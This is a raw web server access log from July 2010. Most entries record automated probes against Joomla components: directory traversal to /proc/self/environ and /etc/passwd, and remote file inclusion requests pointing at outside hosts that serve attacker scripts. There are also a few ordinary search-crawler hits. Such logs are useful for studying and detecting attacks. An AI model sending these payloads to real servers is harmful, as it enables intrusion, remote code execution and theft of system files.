206.210.68.43 - - [05/Jul/2010:02:44:50 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.210.68.43 - - [05/Jul/2010:02:44:50 -0500] "GET /logs/access_log.1266710400%20%20//skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
206.210.68.43 - - [05/Jul/2010:02:44:50 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.210.68.43 - - [05/Jul/2010:02:45:18 -0500] "GET //skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
206.210.68.43 - - [05/Jul/2010:02:45:18 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
206.210.68.43 - - [05/Jul/2010:02:45:18 -0500] "GET /logs/access_log.1266710400%20%20//skin/zero_vote/error.php?dir=http://www.mysandhaanu.com//scripts/id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
194.109.22.66 - - [05/Jul/2010:02:47:45 -0500] "GET /logs/access_log.1277251200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:47:45 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:47:45 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:47:49 -0500] "GET /logs/access_log.1275609600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
92.60.176.46 - - [05/Jul/2010:02:47:58 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:47:58 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:47:58 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
194.109.22.66 - - [05/Jul/2010:02:49:10 -0500] "GET /logs/access_log.1277424000/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:49:10 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:49:10 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:02:49:12 -0500] "GET /logs/access_log.1277251200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
207.46.199.178 - - [05/Jul/2010:02:49:16 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.207.204.37 - - [05/Jul/2010:02:50:39 -0500] "GET /logs/access_log.1277164800//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:02:50:39 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
64.207.204.37 - - [05/Jul/2010:02:50:39 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
118.127.16.179 - - [05/Jul/2010:02:51:31 -0500] "GET /logs/access_log.1266710400//lang.php?mosConfig_absolute_path=http://leah.fileave.com/wetwork/Ckrid2.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.831"
118.127.16.179 - - [05/Jul/2010:02:51:32 -0500] "GET //lang.php?mosConfig_absolute_path=http://leah.fileave.com/wetwork/Ckrid2.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.831"
118.127.16.179 - - [05/Jul/2010:02:51:32 -0500] "GET /logs//lang.php?mosConfig_absolute_path=http://leah.fileave.com/wetwork/Ckrid2.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.831"
92.60.176.46 - - [05/Jul/2010:02:52:29 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:08 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:08 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:08 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:37 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:37 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:54:37 -0500] "GET /logs/access_log.1277164800%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:55:27 -0500] "GET /logs/access_log.1277164800%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:55:29 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:55:29 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:55:48 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:55:48 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:56 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
193.6.244.125 - - [05/Jul/2010:02:55:57 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.60.176.46 - - [05/Jul/2010:02:56:02 -0500] "GET /logs/access_log.1275782400/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:56:58 -0500] "GET /logs/access_log.1276819200%20%20/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 317 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:58:08 -0500] "GET /logs/access_log.1276819200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:59:12 -0500] "GET /logs/access_log.1276819200%20%20/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:59:27 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:59:27 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:02:59:27 -0500] "GET /logs/access_log.1276732800/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
78.41.233.128 - - [05/Jul/2010:03:01:23 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:01:35 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
92.60.176.46 - - [05/Jul/2010:03:01:39 -0500] "GET /logs/access_log.1276646400/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
194.109.22.66 - - [05/Jul/2010:03:01:49 -0500] "GET /logs/access_log.1275609600/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:03:01:49 -0500] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:03:01:49 -0500] "GET /logs/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.816"
194.109.22.66 - - [05/Jul/2010:03:01:59 -0500] "GET /logs/access_log.1277251200/index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.816"
92.60.176.46 - - [05/Jul/2010:03:03:19 -0500] "GET /logs/access_log.1277164800/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:03:19 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:03:30 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
78.41.233.128 - - [05/Jul/2010:03:08:56 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:08:57 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:08:57 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
91.132.160.46 - - [05/Jul/2010:03:09:10 -0500] "GET /logs/?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 200 12135 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
91.132.160.46 - - [05/Jul/2010:03:09:10 -0500] "GET /?option=com_myblog&Itemid=12&task=/../../../../../../../../etc/passwd HTTP/1.1" 200 1003 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
92.60.176.46 - - [05/Jul/2010:03:09:51 -0500] "GET /lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 288 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:09:51 -0500] "GET /logs/access_log.1277164800/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 315 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:09:51 -0500] "GET /logs/lfi%20?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 293 "-""MaMa CaSpEr"
78.41.233.128 - - [05/Jul/2010:03:10:24 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:10:33 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:10:33 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:10:33 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
92.60.176.46 - - [05/Jul/2010:03:11:37 -0500] "GET /lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 298 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:11:37 -0500] "GET /logs/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 303 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:11:37 -0500] "GET /logs/access_log.1275091200/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:11:54 -0500] "GET /logs/access_log.1275609600/lfi%20/index.php?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 325 "-""MaMa CaSpEr"
78.41.233.128 - - [05/Jul/2010:03:11:58 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:12:00 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
65.60.53.2 - - [05/Jul/2010:03:12:04 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
209.61.244.6 - - [05/Jul/2010:03:12:12 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
209.61.244.6 - - [05/Jul/2010:03:12:12 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.76"
67.195.112.180 - - [05/Jul/2010:03:12:34 -0500] "GET /logs/access_log.1275350400 HTTP/1.0" 200 907870 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.171.27 - - [05/Jul/2010:03:13:21 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.108.108.124 - - [05/Jul/2010:03:13:27 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:13:29 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.171.27 - - [05/Jul/2010:03:13:40 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:13:45 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
95.154.248.22 - - [05/Jul/2010:03:13:56 -0500] "GET //index2.php?option=com_gcalendar&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""Advanced Browser (http://www.avantbrowser.com)"
95.154.248.22 - - [05/Jul/2010:03:13:56 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""Advanced Browser (http://www.avantbrowser.com)"
95.154.248.22 - - [05/Jul/2010:03:13:56 -0500] "GET //index2.php?option=com_gcalendar&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
95.154.248.22 - - [05/Jul/2010:03:13:56 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=/../../../../../../../../etc/passwd HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
89.108.108.124 - - [05/Jul/2010:03:14:00 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
119.63.198.13 - - [05/Jul/2010:03:14:12 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
78.41.233.128 - - [05/Jul/2010:03:14:54 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:14:54 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:14:54 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:15:03 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.171.27 - - [05/Jul/2010:03:15:31 -0500] "GET /logs/access_log.1276646400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:15:32 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:15:32 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:15:37 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.171.27 - - [05/Jul/2010:03:15:42 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
89.108.108.124 - - [05/Jul/2010:03:15:45 -0500] "GET /logs/access_log.1276646400//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:15:46 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:15:46 -0500] "GET /logs//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.108.124 - - [05/Jul/2010:03:15:50 -0500] "GET //index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
92.60.176.46 - - [05/Jul/2010:03:16:26 -0500] "GET /?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:16:28 -0500] "GET /logs/access_log.1277164800/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""MaMa CaSpEr"
92.60.176.46 - - [05/Jul/2010:03:16:29 -0500] "GET /logs/?option=com_gcalendar&controller=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 200 12135 "-""MaMa CaSpEr"
207.46.194.84 - - [05/Jul/2010:03:16:39 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.84 - - [05/Jul/2010:03:16:39 -0500] "GET /artwork/tcaboose-trunk.jpg HTTP/1.1" 200 4548 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
78.41.233.128 - - [05/Jul/2010:03:17:08 -0500] "GET /logs/access_log.1276300800//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 378 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:17:08 -0500] "GET //plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
78.41.233.128 - - [05/Jul/2010:03:17:09 -0500] "GET /logs//plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 356 "-""libwww-perl/5.805"
91.121.171.27 - - [05/Jul/2010:03:17:48 -0500] "GET /logs/access_log.1274572800//index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
